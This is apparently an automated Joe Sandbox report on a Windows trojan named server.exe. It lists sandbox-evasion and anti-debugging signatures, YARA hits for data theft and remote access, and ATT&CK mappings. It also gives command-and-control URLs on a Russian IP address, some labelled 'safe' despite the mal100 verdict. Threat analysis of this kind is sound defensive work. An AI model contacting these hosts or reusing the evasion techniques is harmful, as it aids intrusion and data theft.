    Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_007E16DF
    Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_007E832C
    Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_007E1D8A
    Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_00412E5E
    Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_004129C9
    Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_004135CE
    Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_004131FC
    Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_004139B6
    Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_0040110B GetProcAddress,NtCreateSection,memset
    Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_00401459 NtMapViewOfSection
    Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_004019F1 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError
    Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_007E421F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
    Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_007E8551 NtQueryVirtualMemory
    Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_00781C58 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,CreateThread,QueueUserAPC,GetLastError,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,GetLastError,GetLastError
    Source: server.exe | ReversingLabs: Detection: 38%
    Source: server.exe | Virustotal: Detection: 50%
    Source: server.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\server.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_007E30D5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
    Source: C:\Users\user\Desktop\server.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
    Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@1/1
    Source: C:\Users\user\Desktop\server.exe | File read: C:\Windows\System32\drivers\etc\hosts
    Source: C:\Users\user\Desktop\server.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\server.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

    Data Obfuscation

    Source: C:\Users\user\Desktop\server.exe | Unpacked PE file: 0.2.server.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
    Source: C:\Users\user\Desktop\server.exe | Unpacked PE file: 0.2.server.exe.400000.0.unpack
    Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_007E7F30 push ecx; ret 0_2_007E7F39
    Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_007E831B push ecx; ret 0_2_007E832B
    Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_0085D0A4 push ebp; ret 0_2_0085D0A9
    Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_00857CD7 push 8B8751D0h; retf 0_2_00857CDC
    Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_0085DAFD push ds; ret 0_2_0085DB0B
    Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_0085D782 push ds; ret 0_2_0085D783
    Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_00401000 LoadLibraryA,GetProcAddress,0_2_00401000

    Hooking and other Techniques for Hiding and Protection

    Source: Yara match | File source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: Process Memory Space: server.exe PID: 6020, type: MEMORYSTR
    Source: C:\Users\user\Desktop\server.exe | Process information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    Source: C:\Users\user\Desktop\server.exe | Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
    Source: C:\Users\user\Desktop\server.exe TID: 6040 | Thread sleep count: 98 > 30
    Source: C:\Users\user\Desktop\server.exe TID: 6040 | Thread sleep count: 82 > 30
    Source: C:\Users\user\Desktop\server.exe TID: 6040 | Thread sleep count: 46 > 30
    Source: C:\Users\user\Desktop\server.exe TID: 6040 | Thread sleep count: 99 > 30
    Source: C:\Users\user\Desktop\server.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
    Source: C:\Users\user\Desktop\server.exe | API call chain: ExitProcess graph end node
    Source: server.exe, 00000000.00000002.509882695.0000000000863000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000000.00000002.509882695.00000000008B2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW

    Anti Debugging

    Source: C:\Users\user\Desktop\server.exe | Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
    Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_0078092B mov eax, dword ptr fs:[00000030h] 0_2_0078092B
    Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_00780D90 mov eax, dword ptr fs:[00000030h] 0_2_00780D90
    Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_008551AC push dword ptr fs:[00000030h] 0_2_008551AC
    Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_00401000 LoadLibraryA,GetProcAddress,0_2_00401000
    Source: C:\Users\user\Desktop\server.exe | Code function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_004019F1
    Source: C:\Users\user\Desktop\server.exe | Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_00410C7F
    Source: C:\Users\user\Desktop\server.exe | Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,0_2_004118DB
    Source: C:\Users\user\Desktop\server.exe | Code function: __crtGetLocaleInfoA_stat,0_2_004154FA
    Source: C:\Users\user\Desktop\server.exe | Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,___crtGetLocaleInfoA,0_2_0041089B
    Source: C:\Users\user\Desktop\server.exe | Code function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,CreateThread,QueueUserAPC,GetLastError,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,GetLastError,GetLastError,0_2_00781C58
    Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_007E3BD3 cpuid 0_2_007E3BD3
    Source: C:\Users\user\Desktop\server.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_00401D68 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_00401D68
    Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_004015B0 GetSystemTimeAsFileTime,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_004015B0
    Source: C:\Users\user\Desktop\server.exe | Code function: 0_2_007E3BD3 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,0_2_007E3BD3

    Stealing of Sensitive Information

    Source: Yara match | File source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: Process Memory Space: server.exe PID: 6020, type: MEMORYSTR

    Remote Access Functionality

    Source: Yara match | File source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: Process Memory Space: server.exe PID: 6020, type: MEMORYSTR

    MITRE ATT&CK Matrix

    Techniques with matched signatures, by tactic (number of matching signatures in parentheses):

    Execution: Windows Management Instrumentation (2), Native API (12)
    Defense Evasion: Virtualization/Sandbox Evasion (11), Obfuscated Files or Information (1), Software Packing (21)
    Credential Access: Input Capture (1)
    Discovery: System Time Discovery (1), Security Software Discovery (11), Virtualization/Sandbox Evasion (11), Process Discovery (1), Account Discovery (1), System Owner/User Discovery (1), Remote System Discovery (1), System Information Discovery (124)
    Collection: Input Capture (1), Archive Collected Data (11)
    Command and Control: Encrypted Channel (2), Ingress Tool Transfer (1), Non-Application Layer Protocol (2), Application Layer Protocol (12)
    Impact: Data Encrypted for Impact (1)
    Antivirus, Machine Learning and Genetic Malware Detection

    Source | Detection | Scanner | Label
    server.exe | 38% | ReversingLabs | Win32.Trojan.Generic
    server.exe | 51% | Virustotal |
    server.exe | 100% | Joe Sandbox ML |
    No Antivirus matches
    Source | Detection | Scanner | Label
    0.2.server.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7
    0.2.server.exe.7e0000.2.unpack | 100% | Avira | HEUR/AGEN.1245293
    No Antivirus matches
    Source | Detection | Scanner | Label
    http://62.173.142.51/ | 0% | Avira URL Cloud | safe
    http://62.173.142.51/drew/9JLLLQ08ZT/3nAR5UipYIcJ6YCNU/DQSgo3cwsXXD/wvZ5vmAsFoS/eN07eLMp7RXTwB/STvLb_2BVZ4b1fMQvftqC/DrhbQbfPiZSBlmnh/Q60mymncnsD1BSl/lgW04WzkBwMabSScvE/3MDL0Eyu0/chVZbMtmkjfLI4ISTEnD/sLlQp4wto2w2tJ4sMhW/deWpiBQ03TPTGzGU4_2FTK/eoq2qHiaYlnL2/Y44FiYqv/mKJo7GKlTdrY4JvUjnEzoh2/JtdyUM2ECt/vn.jlk | 0% | Avira URL Cloud | safe
    http://62.173.142.51/b | 0% | Avira URL Cloud | safe
    http://62.173.142.51/drew/9JLLLQ08ZT/3nAR5UipYIcJ6YCNU/DQSgo3cwsXXD/wvZ5vmAsFoS/eN07eLMp7RXTwB/STvLb | 0% | Avira URL Cloud | safe
    http://62.173 | 0% | Avira URL Cloud | safe

    Domains and IPs

    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    windowsupdatebg.s.llnwi.net | 95.140.230.192 | true | false | | unknown
    checklist.skype.com | unknown | unknown | false | | high

    Name | Malicious | Antivirus Detection | Reputation
    http://62.173.142.51/drew/9JLLLQ08ZT/3nAR5UipYIcJ6YCNU/DQSgo3cwsXXD/wvZ5vmAsFoS/eN07eLMp7RXTwB/STvLb_2BVZ4b1fMQvftqC/DrhbQbfPiZSBlmnh/Q60mymncnsD1BSl/lgW04WzkBwMabSScvE/3MDL0Eyu0/chVZbMtmkjfLI4ISTEnD/sLlQp4wto2w2tJ4sMhW/deWpiBQ03TPTGzGU4_2FTK/eoq2qHiaYlnL2/Y44FiYqv/mKJo7GKlTdrY4JvUjnEzoh2/JtdyUM2ECt/vn.jlk | false | Avira URL Cloud: safe | unknown

    Name | Source | Malicious | Antivirus Detection | Reputation
    http://62.173.142.51/b | server.exe, 00000000.00000002.509818085.0000000000830000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://62.173.142.51/ | server.exe, 00000000.00000002.509882695.0000000000863000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://checklist.skype.com/drew/libExsiR_2B8yxsG/gzT0k6OLSRpq780/hHFpS0TQeiCZoSZxmo/_2BfNC9Bm/rlL_2B | server.exe, 00000000.00000002.509882695.0000000000863000.00000004.00000020.00020000.00000000.sdmp | false | | high
    http://62.173 | server.exe, 00000000.00000002.510020655.00000000023CC000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
    http://62.173.142.51/drew/9JLLLQ08ZT/3nAR5UipYIcJ6YCNU/DQSgo3cwsXXD/wvZ5vmAsFoS/eN07eLMp7RXTwB/STvLb | server.exe, 00000000.00000002.509882695.00000000008A6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    IP | Domain | Country | ASN | ASN Name | Malicious
    62.173.142.51 | unknown | Russian Federation | 34300 | SPACENET-AS InternetServiceProvider RU | false
    General Information

    Joe Sandbox Version: 37.0.0 Beryl
    Analysis ID: 825996
    Start date and time: 2023-03-14 08:23:06 +01:00
    Joe Sandbox Product: CloudBasic
    Overall analysis duration: 0h 5m 45s
    Hypervisor based Inspection enabled: false
    Report type: full
    Cookbook file name: default.jbs
    Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
    Number of analysed new started processes analysed: 13
    Number of new started drivers analysed: 0
    Number of existing processes analysed: 0
    Number of existing drivers analysed: 0
    Number of injected processes analysed: 0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode: default
    Analysis stop reason: Timeout
    Sample file name: server.exe
    Detection: MAL
    Classification: mal100.troj.evad.winEXE@1/0@1/1
    EGA Information:
    • Successful, ratio: 100%
    HDC Information:
    • Successful, ratio: 18.4% (good quality ratio 17.6%)
    • Quality average: 81.1%
    • Quality standard deviation: 27.8%
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 46
    • Number of non-executed functions: 43
    Cookbook Comments:
    • Found application associated with file extension: .exe
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
    • Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 209.197.3.8, 93.184.221.240
    • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, www-www.bing.com.trafficmanager.net, wu-bg-shim.trafficmanager.net, wu.azureedge.net, dual-a-0001.dc-msedge.net, www-bing-com.dual-a-0001.a-msedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net
    • Not all processes where analyzed, report is missing behavior information
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
          No simulations
          No context
          No context
          No context
          No created / dropped files found
    Static File Info

    File type: PE32 executable (GUI) Intel 80386, for MS Windows
    Entropy (8bit): 6.821157222424382
    TrID:
    • Win32 Executable (generic) a (10002005/4) 99.96%
    • Generic Win/DOS Executable (2004/3) 0.02%
    • DOS Executable Generic (2002/1) 0.02%
    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
    File name: server.exe
    File size: 239104
    MD5: bfe5c79a11ef437d401fe8a27ea49372
    SHA1: bd04d26776c766934f0acd2885cf97168dc5bbfb
    SHA256: 881d60034e97cfa4e36b8da907e5d2e130c9f19abdd386990ee5a9cdce91d117
    SHA512: 4b803dd0a1f8c378d4e61f753aa84a690908dcd2de8289e331f4b7cbbc28480883f7b26f272dfc0e109ef133a59642f2221981caf4dcaae6412a2439a2e38fb9
    SSDEEP: 6144:iIOuqy8KhQd+1x8toQRwwzsjqxn2Sc4gKO:iLTydhQdjtoR8sjqxn2ScKO
    TLSH: CA349E137391A871E6324A31BE1BC2F5661EFCA44F5967EB23946A2F0D752E1CE31342
    File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........aBL...L...L...#...\...#.../...E...G...L...:...#...a...#...M...#...M...RichL...........PE..L......b...........................
    Icon Hash: 9a82325a89a28ab2

    Static PE Info

    Entrypoint: 0x409761
    Entrypoint Section: .text
    Digitally signed: false
    Imagebase: 0x400000
    Subsystem: windows gui
    Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    DLL Characteristics: NX_COMPAT, TERMINAL_SERVER_AWARE
    Time Stamp: 0x620D9091 [Thu Feb 17 00:02:25 2022 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major: 5
    OS Version Minor: 1
    File Version Major: 5
    File Version Minor: 1
    Subsystem Version Major: 5
    Subsystem Version Minor: 1
    Import Hash: ae274c29ca15928cb1e23f2e712ba155
    Entrypoint Preview (Instruction):
          call 00007F46FCF0236Eh
          jmp 00007F46FCEFBD8Eh
          mov edi, edi
          push ebp
          mov ebp, esp
          mov eax, dword ptr [ebp+08h]
          test eax, eax
          je 00007F46FCEFBF14h
          sub eax, 08h
          cmp dword ptr [eax], 0000DDDDh
          jne 00007F46FCEFBF09h
          push eax
          call 00007F46FCEFB527h
          pop ecx
          pop ebp
          ret
          mov edi, edi
          push ebp
          mov ebp, esp
          mov eax, dword ptr [ebp+08h]
          push esi
          mov esi, ecx
          mov byte ptr [esi+0Ch], 00000000h
          test eax, eax
          jne 00007F46FCEFBF65h
          call 00007F46FCEFEEDDh
          mov dword ptr [esi+08h], eax
          mov ecx, dword ptr [eax+6Ch]
          mov dword ptr [esi], ecx
          mov ecx, dword ptr [eax+68h]
          mov dword ptr [esi+04h], ecx
          mov ecx, dword ptr [esi]
          cmp ecx, dword ptr [0042D340h]
          je 00007F46FCEFBF14h
          mov ecx, dword ptr [0042D0F8h]
          test dword ptr [eax+70h], ecx
          jne 00007F46FCEFBF09h
          call 00007F46FCF02D48h
          mov dword ptr [esi], eax
          mov eax, dword ptr [esi+04h]
          cmp eax, dword ptr [0042D000h]
          je 00007F46FCEFBF18h
          mov eax, dword ptr [esi+08h]
          mov ecx, dword ptr [0042D0F8h]
          test dword ptr [eax+70h], ecx
          jne 00007F46FCEFBF0Ah
          call 00007F46FCF025A7h
          mov dword ptr [esi+04h], eax
          mov eax, dword ptr [esi+08h]
          test byte ptr [eax+70h], 00000002h
          jne 00007F46FCEFBF16h
          or dword ptr [eax+70h], 02h
          mov byte ptr [esi+0Ch], 00000001h
          jmp 00007F46FCEFBF0Ch
          mov ecx, dword ptr [eax]
          mov dword ptr [esi], ecx
          mov eax, dword ptr [eax+04h]
          mov dword ptr [esi+04h], eax
          mov eax, esi
          pop esi
          pop ebp
          retn 0004h
          mov edi, edi
          push ebp
          mov ebp, esp
          sub esp, 10h
          mov eax, dword ptr [0042C908h]
          xor eax, ebp
          mov dword ptr [ebp-04h], eax
          mov edx, dword ptr [ebp+18h]
          push ebx
          Programming Language:
          • [ASM] VS2010 build 30319
          • [ C ] VS2010 build 30319
          • [IMP] VS2008 SP1 build 30729
          • [C++] VS2010 build 30319
          • [RES] VS2010 build 30319
          • [LNK] VS2010 build 30319
    Data Directories

    Name | Virtual Address | Virtual Size | Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x18f6c | 0x78 | .text
    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0xdd08 | .rsrc
    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x4320 | 0x40 | .text
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x1d4 | .text
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
    Sections

    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
    .text | 0x1000 | 0x18a14 | 0x18c00 | False | 0.5078519570707071 | data | 6.313918932739284 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    .data | 0x1a000 | 0x90e88 | 0x13800 | False | 0.9314778645833334 | data | 7.82921848401168 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    .rsrc | 0xab000 | 0xdd08 | 0xde00 | False | 0.4086782094594595 | data | 4.407077801593062 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    Resources

    Name | RVA | Size | Type | Language | Country
    RT_CURSOR | 0xb6f48 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | |
    RT_CURSOR | 0xb7090 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | |
    RT_CURSOR | 0xb71c0 | 0xf0 | Device independent bitmap graphic, 24 x 48 x 1, image size 0 | |
    RT_CURSOR | 0xb72b0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | |
    RT_ICON | 0xab5e0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Finland
    RT_ICON | 0xab5e0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Norway
    RT_ICON | 0xab5e0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Sweden
    RT_ICON | 0xabe88 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Finland
    RT_ICON | 0xabe88 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Norway
    RT_ICON | 0xabe88 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Sweden
    RT_ICON | 0xacf58 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Finland
    RT_ICON | 0xacf58 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Norway
    RT_ICON | 0xacf58 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Sami Lappish | Sweden
    RT_ICON | 0xad800 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Sami Lappish | Finland
    RT_ICON | 0xad800 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Sami Lappish | Norway
    RT_ICON | 0xad800 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Sami Lappish | Sweden
    RT_ICON | 0xafda8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Finland
    RT_ICON | 0xafda8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Norway
    RT_ICON | 0xafda8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Sami Lappish | Sweden
    RT_ICON | 0xb0e80 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Sami Lappish | Finland
    RT_ICON | 0xb0e80 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Sami Lappish | Norway
    RT_ICON | 0xb0e80 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Sami Lappish | Sweden
    RT_ICON | 0xb1d28 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Sami Lappish | Finland
    RT_ICON | 0xb1d28 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Sami Lappish | Norway
    RT_ICON | 0xb1d28 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Sami Lappish | Sweden
    RT_ICON | 0xb23f0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Sami Lappish | Finland
    RT_ICON | 0xb23f0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Sami Lappish | Norway
    RT_ICON | 0xb23f0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Sami Lappish | Sweden
    RT_ICON | 0xb2958 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Sami Lappish | Finland
